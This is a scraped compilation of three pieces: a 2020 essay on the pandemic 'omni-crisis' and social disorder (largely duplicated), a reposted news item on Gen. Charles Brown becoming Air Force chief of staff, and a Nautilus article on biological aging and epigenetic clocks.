The trouble began with the virus. The virus – and the confused and incoherent response to it – shattered patterns of normal life and normal perceptions of agency. The virus is novel, but the collective shock it evokes is a common reaction under such circumstances. Subjective perception of space and time lose coherence and structure, a looming “sense of a foreshortened future” dominates, and the ability to imagine institutional realities as self-perpetuating diminishes. A symptom of this is the manner in which people suddenly find themselves addicted to enormous amounts of raw, unstructured, information. There is little context that would allow one to dismiss any particular datum, hence everything is mainlined from the content firehose.
We memorize arcane terminology (“R0”, “IFR”, “CFR”, “flatten the curve”), eagerly consume and circulate contextless numbers, and follow the news ticker for each new arbitrary event. Long-term decision-making capacity decays because each day means less and less basis for the making of substantive binding commitments. Typical scenario analysis becomes less effective because scenarios in this mode are often deviations from a stable baseline. If no such baseline exists then scenario planning in the classical style becomes far less tenable. The omni-crisis is, of course, far more than just the virus but the virus’ utter indifference to human social mythologies makes it a fitting trigger for other cascading failures and heightened contradictions. What happens next? That has not yet been decided. And good luck trying to predict it.
What makes human behavior predictable is constraint. Some constraints are physical and biological. Humans beings are subject to physical law much as everything else in the universe is. That which goes up must come down. Force equals mass times acceleration. Likewise, though human lifespans can vary widely aging is a biological process all humans are subject to. On a related note, death – lurking somewhere in the future – is the ultimate constraint. Other constraints are fuzzier. Human short term memory storage capacity is limited but how and why it is limited is not as obvious. Additionally, it is commonly accepted that human minds are subject to physical limitations on information-processing and decision-making but whether or not this leads to biased and inaccurate thoughts and decisions is a hotly debated subject.
The weakest constraints of all are social constraints. Without norms, conventions, and institutions, humans would constantly need to evaluate their surroundings to get a sense of what their neighbors are doing prior to selecting actions. When these structures constrain behavior, humans can be “thoughtless.” We do not think, we simply do. Because it is the way things have always been done, and we do not need to think about it. We can take things for granted, and project out stable patterns for the duration of our lives. Social constraints flatten, canalize, and domesticate human behavior, and they are what largely make “social science” possible. The social scientist searches for stable regularities to document, but everyday citizens depend on them to go about life without worry.
When social constraints are weakened, the aggregate predictability of human behavior diminishes. Why? The weakening of constraints generates confusion. Things have always worked until they suddenly break. Things have always been decided for you until you have to suddenly decide on your own. Another way of thinking about social constraints – with a very long history in social science – posits them as involuntarily assigned expectations about the future. Prolonged and severe disruption of expectations without immediate prospect of relief accordingly should create greater variance in potential outcomes. The simplest way to understand the omni-crisis is as the sustained breaking of expectations and disruption of the ability to simulate the future forward using assumed constraints.
We ordinarily associate these periods with times of revolutionary change, imagining people pursuing goals they never previously imagined possible. We imagine great movements and organizations. There is some truth to this, but the reality is both far more banal and terrifying simultaneously. When institutional realities no longer appear to be self-perpetuating, people struggle to think a day or even a few hours ahead at a time. Tanner Greer captures the half-organized quality of collective decision-making in moments of disorder in describing the emergence of riots:
This then is the general pattern of riots: An event occurs that signals to would-be rioters that they may soon be able to riot. This event gathers a crowd. A significant percentage of this crowd—though rarely, it seems, the majority—are eager for destruction. An entrepreneurial would-be rioter tests the crowd for the presence of other rioters by engaging in a minor (yet easily perceived) act of carnage. Other rioters follow suit, and as the number of offenders grow so does their willingness to take increasingly brazen acts of vandalism, theft, or violence. Notice that this schema is value neutral: it describes both the football hooligan and the race rioter, 19th century Russian pogroms and 21st century Hong Kong street battles. In all of these a certain percentage of the participants plays the game for fairly mundane reasons: to revel in excitement or terror, lose themselves in a rare sense of solidarity, belonging, or power, or to simply gain the monetary rewards that come with theft and looting. The proportion of the population willing to join a riot to attain these things likely reflects the proportion of the population otherwise cut off from them in normal times. Few rioters are married men who must be at work at 8:00 AM the next morning.
As Greer hints, disruptions have historically cast an unflattering light on certain inconvenient aspects of human nature. Since ancient times, humans have understood that stability hinders the full expression of particular personalities that suddenly discover outlets in prolonged episodes of disorder and confusion. Greer describes a particular subset of them – people who suddenly acquire a means of satisfying desires for stimulation, community, revenge, fulfillment of generalized base emotions, money, and particular material goods. The outlet for this is collective anti-social behavior. But if we look beyond the singular event type of the riot, we can also see something similar at work in mass behavior.
Large numbers of people lack stable identities and preferences. They are easily influenced by whatever novel state or circumstance they find themselves in. They will follow the rebels one day and demand the gendarmes open fire on the aforementioned rebels the day after. Others systematically falsify their preferences. Moments of disorder may reveal they lack any principled desire to support the Powers That Be once visible authority weakens. But, alternatively, disorder also may reveal that they are willing to tolerate brutal violence against their fellow citizens out of fear or a desire for stability. Finally, there will always be ambitious and dangerous men and women who see disorder as an opportunity to exploit the passions, fears, and desires of others to attain power, glory, respect, and spoils denied to them during more peaceful and stable times.
No one really “owns” prolonged and often contested periods of disruption, making discussions of who is an insider and who is an outsider often hopelessly subjective in the abstract and highly contextual in the particular. There is always a large mass of people with a diversity of motives, attitudes, dispositions, and ideologies. And while many are unavoidably thinking in the short term, there is also a unequal distribution of planning capacity. Some can see multiple moves down the game tree. Others act more or less reactively and in a pre-programmed fashion. This applies both to people engaging in traditional risk-seeking behaviors as well as ordinary “normies” with families and suburban homes. And it certainly applies to the assorted mixture of professional and amateur propagandists seeking to shape perceptions behind the scenes.
Over the long scope of human history, the progressive saturation of external mechanisms for storing, transmitting, and modifying information makes so-called “stand alone complexes” more and more prevalent. A stand alone complex is copycat behavior without a true originating behavior. A rumored and heavily publicized action – not necessarily real but only supposed – can motivate a subset of people to imitate it. They move towards the same posited end as the behavior, even if the behavior itself never originally took place. People acting individually thus can cooperate unknowingly towards that end as if they acted in a pre-planned manner. While the term was popularized by science fiction, the actual fiction in question merely harkens back the turmoil of the 1960s and 70s and its wave of highly publicized militant actions. The tweet, in other words, recapitulates the photo or broadcast.
The present saturation of electronic media (television, radio, and online communications) also enables rapid and often whiplash-inducing swings of opinion among both elite tastemakers and plugged-in information consumers. These sudden swings, in which everyone is demanded to suddenly accommodate themselves to their group’s new consensus narrative, occur too frequently for anyone to hope to adapt to them. After each swing, the group makes a totalizing demand that the individual publicly submit to the new motto and signal support for it. Failure to do so results in both direct social pressure being suddenly applied to individuals as well as powerful individual fears of being severed from meaningful social connections. But with consensus ephemeral, another swing could be days or even hours or minutes away.
Above all else, prolonged disruptions tend to alter the calculations of those still capable of calculating at all during stressful times. Once-sure bets are cast aside, forcing hedging behaviors and consideration of previously taboo actions and operations. This becomes particularly dangerous during competitive or broadly zero-sum interactions. The most important variables for predicting what kinds of choices are made during such interactions are often unobservable to both observers and participants and only seem retroactively obvious. And the more convoluted the decision, the more untangling it requires thinking about what actors expect other actors to do given what they expect other actors to do, and so forth.
Let’s be clear. Responsibility is not equal. The omni-crisis drags on because there is little desire or ability on the part of authorities to resolve the confusion prolonged disruption generates. Their actions are often at negligent or irresponsible at best. At worst, they are deliberately malicious and hateful. Much more can and should be said about this. But the overriding message of this post is that the omni-crisis has significantly enlarged the space of possible outcomes beyond that normally considered day-to-day by most Americans. And it is not clear how many people in positions of influence and authority recognize this at all. They cheer on their favored factions and issue inflammatory declarations and demands. Do they know there are dragons where we are going? And, more disturbingly, do they even care?
01 June 2020
We are in a period of extended turmoil that might informally be called the “omni-crisis.” There is no clear resolution in sight to the COVID-19 pandemic and the various material, psychological, social, economic, and political disruptions it has directly or indirectly produced or accelerated. Escalating civil unrest without an obvious off-ramp now follows in its wake. This moment may pass (hopefully sooner rather than later) and be memory-holed as a particularly nasty but ultimately temporary lapse of collective judgment. If this indeed occurs, this post will likely seem overly dramatic in its warning of a great rupture in the fabric of social space-time. Or current events may be far more sinister and consequential in nature than depicted here. In which case this post may seem overly naive in its refusal to directly entertain the worst-case scenarios. Consider this non-exhaustive list of factors simultaneously operative in America this month:
Historically unpopular and divisive President
The prospect of contested 2020 general elections
Intense political factionalism and micro-factionalism
Widespread economic devastation
Fraying social safety net
100,000+ dead from a pandemic
Half-implemented lockdown
Rising US-China tensions
US exit from international institutions
Widely televised images of security force brutality against civilians
Nationwide protests, riots, and clashes
Clampdowns and threats of further and more severe crackdowns
What do all of these things together mean in totality? Nothing. But also everything. Do not needlessly panic. However, the longer the omni-crisis continues, the narrower and narrower the window for escaping from it without substantial damage will be. But, you say, haven’t we suffered enough? Look at the damage we have already incurred! To butcher a saying applicable to a totally different context, there is plenty of room at the bottom. People grow acclimated to things thought previously intolerable, causing them to (rightly) fear even more terrible outcomes. By our own merits, we’ve already adjusted to a level of uncertainty about social arrangements that we previously thought intolerable. And we may adjust ourselves again sooner than we think.
“Is this as bad as 1968?” is an utterly meaningless question precisely for this underlying reason. People do not invoke 1968 because of the objective similarities between 2020 and 1968. They do so because we have crossed a threshold at which basic foundations of social organization we take for granted now seem up for grabs. This is an inherently subjective determination, based on the circumstances of our present much as people in 1968 similarly judged the state of their worlds to be in flux. 1968 is an arbitrary signpost on an unfamiliar road we are driving down at breakneck speeds. You can blast “Gimme Shelter” on the car stereo for the aesthetic, but it’s not worth much more than that.
The trouble began with the virus. The virus – and the confused and incoherent response to it – shattered patterns of normal life and normal perceptions of agency. The virus is novel, but the collective shock it evokes is a common reaction under such circumstances. Subjective perception of space and time lose coherence and structure, a looming “sense of a foreshortened future” dominates, and the ability to imagine institutional realities as self-perpetuating diminishes. A symptom of this is the manner in which people suddenly find themselves addicted to enormous amounts of raw, unstructured, information. There is little context that would allow one to dismiss any particular datum, hence everything is mainlined from the content firehose.
We memorize arcane terminology (“R0”, “IFR”, “CFR”, “flatten the curve”), eagerly consume and circulate contextless numbers, and follow the news ticker for each new arbitrary event. Long-term decision-making capacity decays because each day means less and less basis for the making of substantive binding commitments. Typical scenario analysis becomes less effective because scenarios in this mode are often deviations from a stable baseline. If no such baseline exists then scenario planning in the classical style becomes far less tenable. The omni-crisis is, of course, far more than just the virus but the virus’ utter indifference to human social mythologies makes it a fitting trigger for other cascading failures and heightened contradictions. What happens next? That has not yet been decided. And good luck trying to predict it.
What makes human behavior predictable is constraint. Some constraints are physical and biological. Humans beings are subject to physical law much as everything else in the universe is. That which goes up must come down. Force equals mass times acceleration. Likewise, though human lifespans can vary widely aging is a biological process all humans are subject to. On a related note, death – lurking somewhere in the future – is the ultimate constraint. Other constraints are fuzzier. Human short term memory storage capacity is limited but how and why it is limited is not as obvious. Additionally, it is commonly accepted that human minds are subject to physical limitations on information-processing and decision-making but whether or not this leads to biased and inaccurate thoughts and decisions is a hotly debated subject.
The weakest constraints of all are social constraints. Without norms, conventions, and institutions, humans would constantly need to evaluate their surroundings to get a sense of what their neighbors are doing prior to selecting actions. When these structures constrain behavior, humans can be “thoughtless.” We do not think, we simply do. Because it is the way things have always been done, and we do not need to think about it. We can take things for granted, and project out stable patterns for the duration of our lives. Social constraints flatten, canalize, and domesticate human behavior, and they are what largely make “social science” possible. The social scientist searches for stable regularities to document, but everyday citizens depend on them to go about life without worry.
When social constraints are weakened, the aggregate predictability of human behavior diminishes. Why? The weakening of constraints generates confusion. Things have always worked until they suddenly break. Things have always been decided for you until you have to suddenly decide on your own. Another way of thinking about social constraints – with a very long history in social science – posits them as involuntarily assigned expectations about the future. Prolonged and severe disruption of expectations without immediate prospect of relief accordingly should create greater variance in potential outcomes. The simplest way to understand the omni-crisis is as the sustained breaking of expectations and disruption of the ability to simulate the future forward using assumed constraints.
We ordinarily associate these periods with times of revolutionary change, imagining people pursuing goals they never previously imagined possible. We imagine great movements and organizations. There is some truth to this, but the reality is both far more banal and terrifying simultaneously. When institutional realities no longer appear to be self-perpetuating, people struggle to think a day or even a few hours ahead at a time. Tanner Greer captures the half-organized quality of collective decision-making in moments of disorder in describing the emergence of riots:
This then is the general pattern of riots: An event occurs that signals to would-be rioters that they may soon be able to riot. This event gathers a crowd. A significant percentage of this crowd—though rarely, it seems, the majority—are eager for destruction. An entrepreneurial would-be rioter tests the crowd for the presence of other rioters by engaging in a minor (yet easily perceived) act of carnage. Other rioters follow suit, and as the number of offenders grow so does their willingness to take increasingly brazen acts of vandalism, theft, or violence. Notice that this schema is value neutral: it describes both the football hooligan and the race rioter, 19th century Russian pogroms and 21st century Hong Kong street battles. In all of these a certain percentage of the participants plays the game for fairly mundane reasons: to revel in excitement or terror, lose themselves in a rare sense of solidarity, belonging, or power, or to simply gain the monetary rewards that come with theft and looting. The proportion of the population willing to join a riot to attain these things likely reflects the proportion of the population otherwise cut off from them in normal times. Few rioters are married men who must be at work at 8:00 AM the next morning.
As Greer hints, disruptions have historically cast an unflattering light on certain inconvenient aspects of human nature. Since ancient times, humans have understood that stability hinders the full expression of particular personalities that suddenly discover outlets in prolonged episodes of disorder and confusion. Greer describes a particular subset of them – people who suddenly acquire a means of satisfying desires for stimulation, community, revenge, fulfillment of generalized base emotions, money, and particular material goods. The outlet for this is collective anti-social behavior. But if we look beyond the singular event type of the riot, we can also see something similar at work in mass behavior.
Large numbers of people lack stable identities and preferences. They are easily influenced by whatever novel state or circumstance they find themselves in. They will follow the rebels one day and demand the gendarmes open fire on the aforementioned rebels the day after. Others systematically falsify their preferences. Moments of disorder may reveal they lack any principled desire to support the Powers That Be once visible authority weakens. But, alternatively, disorder also may reveal that they are willing to tolerate brutal violence against their fellow citizens out of fear or a desire for stability. Finally, there will always be ambitious and dangerous men and women who see disorder as an opportunity to exploit the passions, fears, and desires of others to attain power, glory, respect, and spoils denied to them during more peaceful and stable times.
No one really “owns” prolonged and often contested periods of disruption, making discussions of who is an insider and who is an outsider often hopelessly subjective in the abstract and highly contextual in the particular. There is always a large mass of people with a diversity of motives, attitudes, dispositions, and ideologies. And while many are unavoidably thinking in the short term, there is also a unequal distribution of planning capacity. Some can see multiple moves down the game tree. Others act more or less reactively and in a pre-programmed fashion. This applies both to people engaging in traditional risk-seeking behaviors as well as ordinary “normies” with families and suburban homes. And it certainly applies to the assorted mixture of professional and amateur propagandists seeking to shape perceptions behind the scenes.
Over the long scope of human history, the progressive saturation of external mechanisms for storing, transmitting, and modifying information makes so-called “stand alone complexes” more and more prevalent. A stand alone complex is copycat behavior without a true originating behavior. A rumored and heavily publicized action – not necessarily real but only supposed – can motivate a subset of people to imitate it. They move towards the same posited end as the behavior, even if the behavior itself never originally took place. People acting individually thus can cooperate unknowingly towards that end as if they acted in a pre-planned manner. While the term was popularized by science fiction, the actual fiction in question merely harkens back the turmoil of the 1960s and 70s and its wave of highly publicized militant actions. The tweet, in other words, recapitulates the photo or broadcast.
The present saturation of electronic media (television, radio, and online communications) also enables rapid and often whiplash-inducing swings of opinion among both elite tastemakers and plugged-in information consumers. These sudden swings, in which everyone is demanded to suddenly accommodate themselves to their group’s new consensus narrative, occur too frequently for anyone to hope to adapt to them. After each swing, the group makes a totalizing demand that the individual publicly submit to the new motto and signal support for it. Failure to do so results in both direct social pressure being suddenly applied to individuals as well as powerful individual fears of being severed from meaningful social connections. But with consensus ephemeral, another swing could be days or even hours or minutes away.
Above all else, prolonged disruptions tend to alter the calculations of those still capable of calculating at all during stressful times. Once-sure bets are cast aside, forcing hedging behaviors and consideration of previously taboo actions and operations. This becomes particularly dangerous during competitive or broadly zero-sum interactions. The most important variables for predicting what kinds of choices are made during such interactions are often unobservable to both observers and participants and only seem retroactively obvious. And the more convoluted the decision, the more untangling it requires thinking about what actors expect other actors to do given what they expect other actors to do, and so forth.
Let’s be clear. Responsibility is not equal. The omni-crisis drags on because there is little desire or ability on the part of authorities to resolve the confusion prolonged disruption generates. Their actions are often at negligent or irresponsible at best. At worst, they are deliberately malicious and hateful. Much more can and should be said about this. But the overriding message of this post is that the omni-crisis has significantly enlarged the space of possible outcomes beyond that normally considered day-to-day by most Americans. And it is not clear how many people in positions of influence and authority recognize this at all. They cheer on their favored factions and issue inflammatory declarations and demands. Do they know there are dragons where we are going? And, more disturbingly, do they even care?
title: US Air Force Gen. Charles Brown makes history by becoming the first Black officer to lead a military branch
title: US Air Force Gen. Charles Brown makes history by becoming the first Black officer to lead a military branch description: Trending By Chandakay in News 16 Jun, 2020 By Happyson in Education 16 Jun, 2020 By KevinMwila in Politics 16 Jun, 2020 By Mwila01 in Health image: http://www.africanewspay.com/wp-content/uploads/2020/06/IMG_20200612_005230.png
image: http://www.africanewspay.com/wp-content/uploads/2020/06/IMG_20200612_005230.png title: US Air Force Gen. Charles Brown makes history by becoming the first Black officer to lead a military branch
Gen. Charles Brown, Jr. was confirmed by the Senate as the next Air Force chief of staff. He will be the first African American to serve as leader of one of the uniformed military branches.
Brown, a distinguished airman and the current commander of US Pacific Air Forces, has served the Air Force for 35 years, during which time he has held a number of important commands and flown combat missions.
His confirmation comes at a time of nationwide unrest over racial injustice, a subject the general spoke passionately about last week in a powerful video message.
Visit Business Insider’s homepage for more stories.
The Senate unanimously confirmed Gen. Charles “CQ” Brown Jr. as the next Air Force chief of staff on Tuesday. He will be the first African American airman to serve as a military service chief, making the general’s confirmation a historic achievement.
Brown, the current commander of US Pacific Air Forces, was nominated by the president to be the 22nd Air Force chief of staff on March 2.
Commissioned after graduating from Texas Tech University in 1984, Brown has served the Air Force for 35 years.
The distinguished four-star general has nearly 3,000 flying hours, including 130 combat hours, primarily in F-16 Fighting Falcons. Brown has commanded a fighter squadron, two fighter wings, and US Air Forces Central Command. He has also served as the deputy commander for US Central Command, according to his Air Force biography.
“CQ Brown is one of the finest warriors our Air Force has ever produced,” Gen. Dave Goldfein, the current Air Force chief of staff who is set to retire at the end of the month, said after Brown’s nomination. “He’s led worldwide – in the Pacific, Europe, the Middle East and Africa. When it comes to global, operational savvy there’s nobody stronger.”
Speaking before the Senate Armed Services Committee early last month, Brown said that he was committed to seeing the Air Force achieve“irreversible momentum towards the implementation of the National Defence Strategy and an integrated and more lethal joint force.”
Responding to Brown’s confirmation Tuesday, President Donald Trump tweeted that he was looking forward to working with the general, characterising him as “a Patriot and Great Leader.”
US Air Force Gen. Charles Brown makes history by becoming the first Black officer to lead a military branch
Gen. Charles Brown, Jr. was confirmed by the Senate as the next Air Force chief of staff. He will be the first African American to serve as leader of one of the uniformed military branches.Brown, a distinguished airman and the current commander of US Pacific Air Forces, has served the Air Force for 35 years, during which time he has held a number of important commands and flown combat missions. His confirmation comes at a time of nationwide unrest over racial injustice, a subject the general spoke passionately about last week in a powerful video message.Visit Business Insider’s homepage for more stories. The Senate unanimously confirmed Gen. Charles “CQ” Brown Jr. as the next Air Force chief of staff on Tuesday. He will be the first African American airman to serve as a military service chief, making the general’s confirmation a historic achievement. Brown, the current commander of US Pacific Air Forces, was nominated by the president to be the 22nd Air Force chief of staff on March 2. Commissioned after graduating from Texas Tech University in 1984, Brown has served the Air Force for 35 years. The distinguished four-star general has nearly 3,000 flying hours, including 130 combat hours, primarily in F-16 Fighting Falcons. Brown has commanded a fighter squadron, two fighter wings, and US Air Forces Central Command. He has also served as the deputy commander for US Central Command, according to his Air Force biography. “CQ Brown is one of the finest warriors our Air Force has ever produced,” Gen. Dave Goldfein, the current Air Force chief of staff who is set to retire at the end of the month, said after Brown’s nomination. “He’s led worldwide – in the Pacific, Europe, the Middle East and Africa. When it comes to global, operational savvy there’s nobody stronger.” Speaking before the Senate Armed Services Committee early last month, Brown said that he was committed to seeing the Air Force achieve“irreversible momentum towards the implementation of the National Defence Strategy and an integrated and more lethal joint force.” Responding to Brown’s confirmation Tuesday, President Donald Trump tweeted that he was looking forward to working with the general, characterising him as “a Patriot and Great Leader.” Source: https://www.businessinsider.com.au/charles-brown-confirmed-air-force-chief-of-staff-2020-6/amp
title: Why You Can’t Help But Act Your Age - Aging on Nautilus
title: Why You Can’t Help But Act Your Age description: In 1979, psychologist Ellen Langer and her students carefully refurbished an old monastery in Peterborough, New Hampshire, to resemble a place that would have existed two decades earlier. They… author: Anil Ananthaswamy image: http://nautilus-vertical.s3.amazonaws.com/aging_0x0_476x316_a-218.png
description: In 1979, psychologist Ellen Langer and her students carefully refurbished an old monastery in Peterborough, New Hampshire, to resemble a place that would have existed two decades earlier. They invited... image: http://nautilus-vertical.s3.amazonaws.com/aging_0x0_476x316_a-218.png title: Why You Can’t Help But Act Your Age - Aging on Nautilus
In 1979, psychologist Ellen Langer and her students carefully refurbished an old monastery in Peterborough, New Hampshire, to resemble a place that would have existed two decades earlier. They invited a group of elderly men in their late 70s and early 80s to spend a week with them and live as they did in 1959, “a time when an IBM computer filled a whole room and panty hose had just been introduced to U.S. women,” Langer wrote. Her idea was to return the men, at least in their minds, to a time when they were younger and healthier—and to see if it had physiological consequences.
Every day Langer and her students met with the men to discuss “current” events. They talked about the first United States satellite launch, Fidel Castro entering Havana after his march across Cuba, and the Baltimore Colts winning the NFL championship game. They discussed “current” books: Ian Fleming’s Goldfinger and Leon Uris’ Exodus. They watched Ed Sullivan and Jack Benny and Jackie Gleason on a black-and-white TV, listened to Nat King Cole on the radio, and saw Marilyn Monroe in Some Like It Hot. Everything was transporting the men back to 1959.
When Langer studied the men after a week of such sensory and mindful immersion in the past, she found that their memory, vision, hearing, and even physical strength had improved. She compared the traits to those of a control group of men, who had also spent a week in a retreat. The control group, however, had been told the experiment was about reminiscing. They were not told to live as if it were 1959. The first group, in a very objective sense, seemed younger. The team took photographs of the men before and after the experiment, and people who knew nothing about the study said the men looked younger in the after-pictures, says Langer, who today is a professor of psychology at Harvard University.
IN THE YEAR 1959A psychology experiment that took seniors back to a time when they were young—1959, to be exact, evoked by the images above—revealed that living as they did in 1959 improved their memory, vision, and hearing. Clockwise: Robert Riger / Getty Images; Wikipedia; Wikipedia; Luis Korda/ Wikipedia; Wikipedia; Wikipedia
Langer’s experiment was a tantalizing demonstration that our chronological age based on our birthdate is a misleading indicator of aging. Langer, of course, was tackling the role of the mind in how old we feel and act. Since her study, others have taken a more objective look at the aging body. The goal is to determine an individual’s “biological age,” a term that aims to capture the body’s physiological development and decline with time, and predict, with reasonable accuracy, the risks of disease and death. As scientists have worked to pinpoint a person’s biological age, they have learned that organs and tissues often age differently, making it difficult to reduce biological age to a single number. They have also made a discovery that echoes Langer’s work. How old we feel—our subjective age—can influence how we age. Where age is concerned, the pages torn off a calendar do not tell the whole story.
While we intuitively know what it means to grow old, precise definitions of aging haven’t been easy to come by. In 1956, British gerontologist and author Alex Comfort (later famous for writing The Joy of Sex) memorably defined senescence as “a decrease in viability and an increase in vulnerability.” Any given individual, he wrote, would die from “randomly distributed causes.” Evolutionary biologists think of aging as something that reduces our ability to survive and reproduce because of “internal physiological deterioration.” Such deterioration, in turn, can be understood in terms of cellular functions: The older the cells in an organ, the more likely they are to stop dividing and die, or develop mutations that lead to cancer. This leads us to the idea that our bodies may have a true biological age.
The road to determining that age, though, has not been a straight one. One approach is to look for so-called biomarkers of aging, something that’s changing in the body and can be used as a predictor of the likelihood of being struck by age-related diseases or of how much longer one has left to live. An obvious set of biomarkers could be attributes like blood pressure or body weight. Both tend to go up as the body ages. But they are unreliable. Blood pressure can be affected by medication and body weight depends on lifestyle and diet, and there are people who certainly don’t gain weight as they age.
Where age is concerned, the pages torn off calendar do not tell the whole story.
In the 1990s, one promising biomarker stood out: stretches of DNA called telomeres. They appear at the ends of chromosomes, serving as caps that protect the chromosomes from fraying. Telomeres have often been likened to the plastic tips that similarly protect shoelaces. It turns out that telomeres themselves get shorter and shorter each time a cell divides. And when the telomere shortens beyond a point, the cell dies. There’s a strong relationship between telomere length and health and diseases, such as cancer and atherosclerosis.
But despite a range of studies trying to find such a link, it’s been hard to make the case for telomeres as accurate biomarkers of aging. In 2013, Anne Newman, director of the Center for Aging and Population Health at the University of Pittsburgh, and her student Jason Sanders reviewed the existing literature on telomeres and concluded that “if telomere length is a biomarker of human aging, it is a weak biomarker with poor predictive accuracy.”
“Twenty years ago, people had high hopes that telomere length could actually explain aging, as in biological aging. There was a hope that it would be the root cause of aging,” says Steve Horvath, a geneticist and biostatistician at the University of California, Los Angeles. “Now we know that that’s simply not the case. In the last 10 to 15 years, people realized that there must be other mechanisms that play an important role in aging.”
Attention shifted to how fast stem cells are being depleted in the body, or the efficacy of mitochondria (the organelles inside our cells that produce the energy needed for cells to function). Horvath scoured the data for reliable markers, looking at, for example, levels of gene expression for any strong correlations to aging. He found none.
But that didn’t mean there weren’t reliable biomarkers. There was one set of data Horvath had been studiously avoiding. This had to do with DNA methylation, a process cells use to switch off genes. Methylation mainly involves the addition of a so-called methyl group to cytosine, one of the four main bases that make up strands of DNA. Because DNA methylation does not alter the core genetic sequence, but rather modifies gene expression externally, the process is called epigenetics.
EPIGENETIC CLOCKUCLA geneticist Steve Horvath (above) identified methylation levels on the human genome that serve as remarkable signs of biological aging. “I had never seen anything like it,” he says. “It’s a cliché, but it really was a smoking gun.” Courtesy of Steve Horvath
Horvath didn’t think that epigenetics would have anything to do with aging. “I had data sitting there and I would not really touch them, because I thought there was no meaning in it anyway,” he says.
But some time in 2009, Horvath gave in and analyzed a dataset of methylation levels at 27,000 locations on the human genome—an analysis “you can do in an hour,” he says. Nothing in his 10 years of analyzing genomic datasets had prepared him for the results. “I had never seen anything like it,” he says. “It’s a cliché, but it really was a smoking gun.”
Because their minds were taken back to a time when they were younger, their bodies went back too.
After a few more years of “labor intensive” work, Horvath identified 353 special sites on the human genome that were present in cells in every tissue and organ. Horvath developed an algorithm that used the methylation levels at these 353 sites—regardless of the cell type—to establish an epigenetic clock. His algorithm took into account that in some of these 353 sites, the methylation levels decreased with age, while in others they increased.
In 2013, Horvath published the results of his analysis of 8,000 samples taken from 51 types of healthy tissue and cells, and the conclusions were striking. When he calculated a single number for the biological age of the person based on the weighted average of the methylation levels at the 353 sites, he found that this number correlated well with the chronological age of the person (it was off by less than 3.6 years in 50 percent of the people—a far better correlation than has been obtained for any other biomarker). He also discovered that for middle-aged people and older, the epigenetic clock starts slowing down or speeding up—providing a way of telling whether someone is aging faster or slower than the calendar suggests.
Despite the correlation, Horvath says that biological age, rather than being for the whole body, is better applied to specific tissues and organs, whether it’s bone, blood, heart, lungs, muscles, or even the brain. The difference between the biological age and chronological age can be negative, zero, or positive. A negative deviation means that the tissue or organ is younger than expected; a zero indicates that the tissue is aging normally; and a positive deviation means the tissue or organ is older. Data show that different tissues can age at different rates.
In general, diseases speed up the epigenetic clock, and this is particularly striking in patients with Down’s syndrome or in those infected with HIV. In both cases, the tissues tend to age faster than normal. For instance, the blood and brain tissue in those infected with HIV show accelerated aging. Obesity causes the liver to age faster. And studies of people who died of Alzheimer’s disease show that the prefrontal cortex undergoes accelerated aging. Horvath also analyzed 6,000 samples of cancerous tissue and found that the epigenetic clock was ticking much faster in such cases, showing that the tissue had aged significantly more than the chronological age.
Despite this wealth of data, there is a gaping hole in our understanding of this striking correlation between methylation markers and biological age. “The biggest weakness of the epigenetic clock is that we just don’t understand the precise molecular mechanism behind it,” says Horvath. His speculation—and he stresses it’s just speculation—is that the epigenetic clock is related to what he calls the “epigenetic maintenance system,” molecular and enzymatic processes that maintain the epigenome and protect it from damage. “I feel that these markers are a footprint of that mechanism,” says Horvath. But “why is it so accurate? What pathway relates to it? That’s the biggest challenge right now,” he adds.
Even without understanding exactly how and why it works, the epigenetic clock gives researchers a tool to test the efficacy of anti-aging interventions that can potentially slow aging. “It’d be very exciting to develop a therapy that allows us to reset the epigenetic clock,” says Horvath.
While Horvath is thinking about hormonal treatments, Langer’s work with elderly men at the monastery in New Hampshire suggests that we can use the power of our mind to influence the body. Langer didn’t publish her results in a scientific journal in 1979. At the time, she didn’t have the resources to do a thorough study for the leading journals. “When you run a retreat over the course of five days, it’s very hard to control for everything,” Langer says. “Also, I didn’t have the funds to have, for instance, a vacationing control group. I could have published it in a second-rate journal, but I didn’t see any point to that. I wanted to get the information out there and I wrote it first in a book for Oxford University Press, so it was reviewed.”
Also, her argument that mind and body are one was potentially a little too path-breaking for the journals. “I think they were unlikely to buy the theoretical part of it,” she says. “The findings, improving vision and hearing in an elderly population, were so unusual that they were not going to rush to publish and stick their necks out.” Since then, Langer has pursued the mind-body connection and its effects on physiology and aging in rigorous studies that have been published in numerous scientific journals and books.
Traditionally, the mind-body problem refers to the difficulty of explaining how our ostensibly non-material mental states can affect the material body (clearly seen in the placebo effect). To Langer, the mind and body are one. “Wherever you put the mind you are necessarily putting the body,” she says.
So Langer began asking if subjective mental states could influence something as objective as the levels of blood sugar in patients with Type 2 diabetes. The 46 subjects in her study, all suffering from Type 2 diabetes, were asked to play computer games for 90 minutes. On their desk was a clock. They were asked to switch games every 15 minutes. The twist in the study was that for one-third of the subjects, the clock was ticking slower than real time, for one-third it was going faster, and for the last third, the clock was keeping real time.
Most of us are slaves to our chronological age.
“The question we were asking was would blood sugar level follow real or perceived time,” says Langer. “And the answer is perceived time.” This was a striking illustration of psychological processes—in this case the subjective perception of time—influencing metabolic processes in the body that control the level of blood sugar.
Although Langer did not explore a connection between the mind and epigenetic changes, other studies suggest such a link. In 2013, Richard Davidson of the University of Wisconsin at Madison and his colleagues reported that even one day of mindfulness meditation can impact the expression of genes. In their study, 19 experienced meditators were studied before and after a full day of intensive meditation. For control, the researchers similarly studied a group of 21 people who engaged in a full day of leisure. At the end of the day, the meditators showed lowered levels of activity of inflammatory genes—exactly the kind of effect seen when one takes anti-inflammatory drugs. The study also showed lowered activity of genes that are involved in epigenetically controlling expressions of other genes. The state of one’s mind, it seems, can have an epigenetic effect.
Such studies taken together provide clues as to why the week-long retreat in New Hampshire reversed some of the age-related attributes in elderly men. Because their minds were taken back to a time when they were younger, their bodies too went back to that earlier time, bringing about some of the physiological changes that resulted in improved hearing or grip strength.
But it’s important to point out that biological aging is an inexorable process—and there comes a time when no amount of thinking positive thoughts can halt aging. If body and mind are one and the same—as Langer suggests—then an aging body and aging mind go hand-in-hand, limiting our ability to influence physiological decline with psychological deftness.
Still, Langer thinks that how we age has a lot to do with our perceptions of what aging means—often reinforced by culture and society. “Whether it’s about aging or anything else, if you are surrounded by people who have certain expectations for you, you tend to meet those expectations, positive or negative,” says Langer.
Most of us are slaves to our chronological age, behaving, as the saying goes, age-appropriately. For example, young people often take steps to recover from a minor injury, whereas someone in their 80s may accept the pain that comes with the injury and be less proactive in addressing the problem. “Many people, because of societal expectations, all too often say, ‘Well, what do you expect, as you get older you fall apart,’ ” says Langer. “So, they don’t do the things to make themselves better, and it becomes a self-fulfilling prophecy.”
